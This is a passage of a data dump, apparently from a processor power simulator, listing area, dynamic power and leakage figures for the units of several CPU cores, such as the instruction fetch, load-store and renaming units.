'Execution Unit/Register Files/Runtime Dynamic': 0.0544213,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.148751,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.372135,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.6038,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.000917974,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.000917974,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000825619,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000333866,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00068865,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00335022,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00787022,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0460851,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 2.93141,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.133269,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.156526,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 5.29219,
'Instruction Fetch Unit/Runtime Dynamic': 0.3471,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0366939,
'L2/Runtime Dynamic': 0.00763293,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.89071,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.805089,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0534977,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0534978,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 3.14334,
'Load Store Unit/Runtime Dynamic': 1.12242,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.131916,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.263833,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0468175,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0473088,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.182264,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0220249,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.418797,
'Memory Management Unit/Runtime Dynamic': 0.0693337,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 17.0705,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.148448,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.008779,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0758336,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.23306,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 3.38334,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0542242,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.245279,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.291751,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.128974,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.20803,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.105006,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.44201,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.102778,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.53858,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0551181,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00540973,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0594634,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0400083,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.114581,
'Execution Unit/Register Files/Runtime Dynamic': 0.045418,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.138832,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.327911,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.466,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.000569244,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.000569244,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000514967,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000209829,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000574722,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00222818,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00477343,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.038461,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 2.44645,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.0992052,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.130631,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 4.78369,
'Instruction Fetch Unit/Runtime Dynamic': 0.275299,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0398849,
'L2/Runtime Dynamic': 0.0072389,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.62402,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.67604,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0448694,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0448695,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 2.8359,
'Load Store Unit/Runtime Dynamic': 0.94219,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.11064,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.221281,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0392666,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0398373,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.152111,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0163474,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.375673,
'Memory Management Unit/Runtime Dynamic': 0.0561847,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 16.1632,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.14499,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.00758344,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0629768,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.215551,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 2.96246,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0529102,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.244246,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.270256,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.0878707,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.141732,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.0715416,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.301145,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.0590634,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.42336,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0510571,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00368569,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0470898,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0272579,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
